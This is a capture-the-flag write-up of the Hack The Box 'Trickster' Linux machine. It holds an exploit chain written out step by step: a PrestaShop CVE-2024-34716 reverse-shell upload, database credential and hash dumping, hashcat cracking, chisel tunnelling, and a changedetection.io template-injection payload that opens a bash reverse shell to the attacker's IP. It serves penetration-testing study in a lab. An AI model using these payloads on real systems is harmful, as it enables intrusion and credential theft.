Hack The Box / LINUX / 2026-03-27
Hack The Box - Trickster (Linux)
Initial foothold through PrestaShop CVE-2024-34716, credential extraction from database, pivot to james user, then container escape path via changedetection.io SSTI and reused root password.
Target
- IP:
10.129.114.173
Recon
sudo nmap -sC -sV 10.129.114.173 -p- -T5 -v
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 8c:01:0e:7b:b4:da:b7:2f:bb:2f:d3:a3:8c:a6:6d:87 (ECDSA)
|_ 256 90:c6:f3:d8:3f:96:99:94:69:fe:d3:72:cb:fe:6c:c5 (ED25519)
80/tcp open http Apache httpd 2.4.52
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://trickster.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
1235/tcp filtered mosaicsyssvc1
2861/tcp filtered dialpad-voice2
3103/tcp filtered autocuesmi
5410/tcp filtered salient-usrmgr
6177/tcp filtered unknown
11750/tcp filtered unknown
13255/tcp filtered unknown
15594/tcp filtered unknown
17076/tcp filtered unknown
17949/tcp filtered unknown
18558/tcp filtered unknown
18726/tcp filtered unknown
19296/tcp filtered unknown
20211/tcp filtered unknown
20490/tcp filtered unknown
26843/tcp filtered unknown
28277/tcp filtered unknown
30357/tcp filtered unknown
31000/tcp filtered unknown
32172/tcp filtered unknown
35236/tcp filtered unknown
37057/tcp filtered unknown
38792/tcp filtered unknown
39120/tcp filtered unknown
39359/tcp filtered unknown
43455/tcp filtered unknown
43794/tcp filtered unknown
45995/tcp filtered unknown
53039/tcp filtered unknown
54123/tcp filtered unknown
54648/tcp filtered unknown
55139/tcp filtered unknown
57011/tcp filtered unknown
58468/tcp filtered unknown
58889/tcp filtered unknown
59386/tcp filtered unknown
62087/tcp filtered unknown
64807/tcp filtered unknown
65118/tcp filtered unknown
Service Info: Host: _; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Add trickster.htb to /etc/hosts.
Go to http://trickster.htb/.
There is a link to http://shop.trickster.htb.
Add shop.trickster.htb to /etc/hosts.
Go to http://shop.trickster.htb/.
It is a PrestaShop site.
Register a user.
http://shop.trickster.htb/INSTALL.txt
We see:
===== Installation instructions for PrestaShop 8 =====
There is a vulnerability:
-
https://security.snyk.io/vuln/SNYK-PHP-PRESTASHOPPRESTASHOP-6846214
-
CVE-2024-34716
There is also a PoC for this CVE:
- https://github.com/aelmokhtar/CVE-2024-34716
Go to the Contact Us page. We see the admin email:
admin@trickster.htb
ffuf -u 'http://shop.trickster.htb/FUZZ' -w /home/kali/SecLists/Discovery/Web-Content/raft-small-words.txt -t 50 -fc 403
.git [Status: 301, Size: 323, Words: 20, Lines: 10, Duration: 121ms]
Go to http://shop.trickster.htb/.git/.
The .git directory is exposed.
Download git-dumper:
- https://github.com/arthaud/git-dumper
mkdir prestashop
python3 git_dumper.py http://shop.trickster.htb/ prestashop
cd prestashop
ls
We notice the admin folder:
admin634ewutrx1jgitlooaj
git clone https://github.com/aelmokhtar/CVE-2024-34716.git
cd CVE-2024-34716
Edit exploit.html so it uses the correct admin folder. Edit the IP in reverse_shell.php inside the zip file.
python3 exploit.py 'http://shop.trickster.htb' 'admin@trickster.htb' 'a' exploit.html
Start listener:
nc -vlnp 1234
We get a reverse shell as www-data.
Database Loot
cd
cd prestashop
cat app/config/parameters.php
'database_host' => '127.0.0.1',
'database_port' => '',
'database_name' => 'prestashop',
'database_user' => 'ps_user',
'database_password' => 'prest@shop_o',
'database_prefix' => 'ps_',
'database_engine' => 'InnoDB',
'secret' => 'eHPDO7bBZPjXWbv3oSLIpkn5XxPvcvzt7ibaHTgWhTBM3e7S9kbeB1TPemtIgzog',
'cookie_key' => '8PR6s1SJZLPCjXTegH7fXttSAXbG2h6wfCD3cLk5GpvkGAZ4K9hMXpxBxrf7s42i',
'cookie_iv' => 'fQoIWUoOLU0hiM2VmI1KPY61DtUsUx8g',
'new_cookie_key' => 'def000001a30bb7f2f22b0a7790f2268f8c634898e0e1d32444c3a03f4040bd5e8cb44bdb57a73f70e01cf83a38ec5d2ddc1741476e83c45f97f763e7491cc5e002aff47',
mysql -u ps_user -h 127.0.0.1 -p
Enter password prest@shop_o.
use prestashop
select * from ps_customer;
MariaDB [prestashop]> select * from ps_customer;
+-------------+---------------+---------+-----------+------------------+---------+---------+---------+-------+------+-----------+-----------+----------------------+--------------------------------------------------------------+---------------------+------------+------------+----------------------------+---------------------+-------+---------+--------------------------+--------------------+------------------+----------------------------------+------+--------+----------+---------+---------------------+---------------------+----------------------+-------------------------+
| id_customer | id_shop_group | id_shop | id_gender | id_default_group | id_lang | id_risk | company | siret | ape | firstname | lastname | email | passwd | last_passwd_gen | birthday | newsletter | ip_registration_newsletter | newsletter_date_add | optin | website | outstanding_allow_amount | show_public_prices | max_payment_days | secure_key | note | active | is_guest | deleted | date_add | date_upd | reset_password_token | reset_password_validity |
+-------------+---------------+---------+-----------+------------------+---------+---------+---------+-------+------+-----------+-----------+----------------------+--------------------------------------------------------------+---------------------+------------+------------+----------------------------+---------------------+-------+---------+--------------------------+--------------------+------------------+----------------------------------+------+--------+----------+---------+---------------------+---------------------+----------------------+-------------------------+
| 1 | 1 | 1 | 1 | 3 | 1 | 0 | | | | Anonymous | Anonymous | anonymous@psgdpr.com | $2y$10$054Mo38DcRSLaMX9OhT5UuhYSQvorGu8nZb9GubbAv3Roei6RS2QW | 2024-05-25 13:10:24 | 0000-00-00 | 0 | | 0000-00-00 00:00:00 | 0 | | 0.000000 | 0 | 0 | d12c0c01f2ebcc375cf85eaa3121be52 | | 0 | 0 | 0 | 2024-05-25 19:10:24 | 2024-05-25 19:10:24 | | 0000-00-00 00:00:00 |
| 2 | 1 | 1 | 1 | 3 | 1 | 0 | | | | John | DOE | pub@prestashop.com | $2y$10$Cw68h0u8YeP6IiYRRaOjQu4AV7X9BTQL3ZK4CtHU16PNDg7LB4mEG | 2024-05-25 13:12:00 | 1970-01-15 | 1 | | 2013-12-13 08:19:15 | 1 | | 0.000000 | 0 | 0 | bbab8bd6e54759aea215bd9a4e00a079 | | 1 | 0 | 0 | 2024-05-25 19:12:00 | 2024-05-25 19:12:00 | | 0000-00-00 00:00:00 |
| 4 | 1 | 1 | 1 | 3 | 1 | 0 | NULL | NULL | NULL | adam | adam | adam@trickster.htb | $2y$10$kY2G39RBz9P0S48EuSobuOJba/HgmQ7ZtajfZZ3plVLWnaBbS4gei | 2024-05-25 09:19:39 | 1990-09-19 | 0 | NULL | 0000-00-00 00:00:00 | 0 | NULL | 0.000000 | 0 | 0 | f02f94a3226a0eca87419815a9d7cf24 | NULL | 1 | 0 | 0 | 2024-05-25 15:19:39 | 2024-05-25 15:19:39 | NULL | 0000-00-00 00:00:00 |
| 5 | 1 | 1 | 1 | 3 | 1 | 0 | | | | test | test | test@test.com | $2y$10$U6671G6fYPhaAnN32fKwiun9beoY4u44vTBjYDju5f/ZTZ5r17EJ. | 2024-09-22 21:49:56 | 0000-00-00 | 0 | | 0000-00-00 00:00:00 | 0 | | 0.000000 | 0 | 0 | 5fe8da9d196f59eb9259624dfa7d796f | | 1 | 0 | 0 | 2024-09-23 03:49:56 | 2024-09-23 03:49:56 | | 0000-00-00 00:00:00 |
+-------------+---------------+---------+-----------+------------------+---------+---------+---------+-------+------+-----------+-----------+----------------------+--------------------------------------------------------------+---------------------+------------+------------+----------------------------+---------------------+-------+---------+--------------------------+--------------------+------------------+----------------------------------+------+--------+----------+---------+---------------------+---------------------+----------------------+-------------------------+
4 rows in set (0.001 sec)
Adam hash is not crackable.
select * from ps_employee;
+-------------+------------+---------+----------+-----------+---------------------+--------------------------------------------------------------+---------------------+-----------------+---------------+--------------------+------------------+----------------------+----------------------+----------+----------+-----------+-------------+----------+---------+--------+-------+---------------+--------------------------+------------------+----------------------+----------------------+-------------------------+----------------------+
| id_employee | id_profile | id_lang | lastname | firstname | email | passwd | last_passwd_gen | stats_date_from | stats_date_to | stats_compare_from | stats_compare_to | stats_compare_option | preselect_date_range | bo_color | bo_theme | bo_css | default_tab | bo_width | bo_menu | active | optin | id_last_order | id_last_customer_message | id_last_customer | last_connection_date | reset_password_token | reset_password_validity | has_enabled_gravatar |
+-------------+------------+---------+----------+-----------+---------------------+--------------------------------------------------------------+---------------------+-----------------+---------------+--------------------+------------------+----------------------+----------------------+----------+----------+-----------+-------------+----------+---------+--------+-------+---------------+--------------------------+------------------+----------------------+----------------------+-------------------------+----------------------+
| 1 | 1 | 1 | Store | Trickster | admin@trickster.htb | $2y$10$P8wO3jruKKpvKRgWP6o7o.rojbDoABG9StPUt0dR7LIeK26RdlB/C | 2024-05-25 13:10:20 | 2024-04-25 | 2024-05-25 | 0000-00-00 | 0000-00-00 | 1 | NULL | NULL | default | theme.css | 1 | 0 | 1 | 1 | NULL | 5 | 0 | 0 | 2024-09-23 | NULL | 0000-00-00 00:00:00 | 0 |
| 2 | 2 | 0 | james | james | james@trickster.htb | $2a$04$rgBYAsSHUVK3RZKfwbYY9OPJyBbt/OzGw9UHi4UnlK6yG5LyunCmm | 2024-09-09 13:22:42 | NULL | NULL | NULL | NULL | 1 | NULL | NULL | NULL | NULL | 0 | 0 | 1 | 0 | NULL | 0 | 0 | 0 | NULL | NULL | NULL | 0 |
+-------------+------------+---------+----------+-----------+---------------------+--------------------------------------------------------------+---------------------+-----------------+---------------+--------------------+------------------+----------------------+----------------------+----------+----------+-----------+-------------+----------+---------+--------+-------+---------------+--------------------------+------------------+----------------------+----------------------+-------------------------+----------------------+
Put james hash in a file named hash.
hashcat -a 0 -m 3200 ./hash ./rockyou.txt
We get password: alwaysandforever
ssh james@trickster.htb
Enter recovered password.
Privilege Escalation
Docker exists but this user is not in docker group, so we cannot run docker commands directly. We can check if a docker container has a listening service.
ping 172.17.0.2
PING 172.17.0.2 (172.17.0.2) 56(84) bytes of data.
64 bytes from 172.17.0.2: icmp_seq=1 ttl=64 time=0.080 ms
A container is running.
curl http://172.17.0.2/
curl: (7) Failed to connect to 172.17.0.2 port 80 after 0 ms: Connection refused
We can scan for open ports. See script in attachments:
- attachments/brute_ports.py
python3 attachments/brute_ports.py
Port 5000 is open
Download chisel and upload it to victim:
- https://github.com/jpillora/chisel
On attacker:
./chisel server --port 8000 --reverse
On victim:
./chisel client http://10.10.16.29:8000 R:127.0.0.1:5000:172.17.0.2:5000
Go to http://127.0.0.1:5000/.
It is changedetection.io 0.45.20.
Use password alwaysandforever
There is a vulnerability with exploit details:
- https://blog.hacktivesecurity.com/index.php/2024/05/08/cve-2024-32651-server-side-template-injection-changedetection-io/
Add a new URL:
http://10.10.16.29/test
Go to Notifications tab. In notification body, insert:
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo "bash -i >& /dev/tcp/10.10.16.29/4444 0>&1" > /dev/shm/rev').read() }}
Start listener:
nc -vlnp 4444
Change notification body to:
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('bash /dev/shm/rev').read() }}
Click Send test notification. We get reverse shell as root inside docker container.
cd
cat .bash_history
We notice:
#YouC4ntCatchMe#
Return to james shell:
su root
Enter found password. We are root.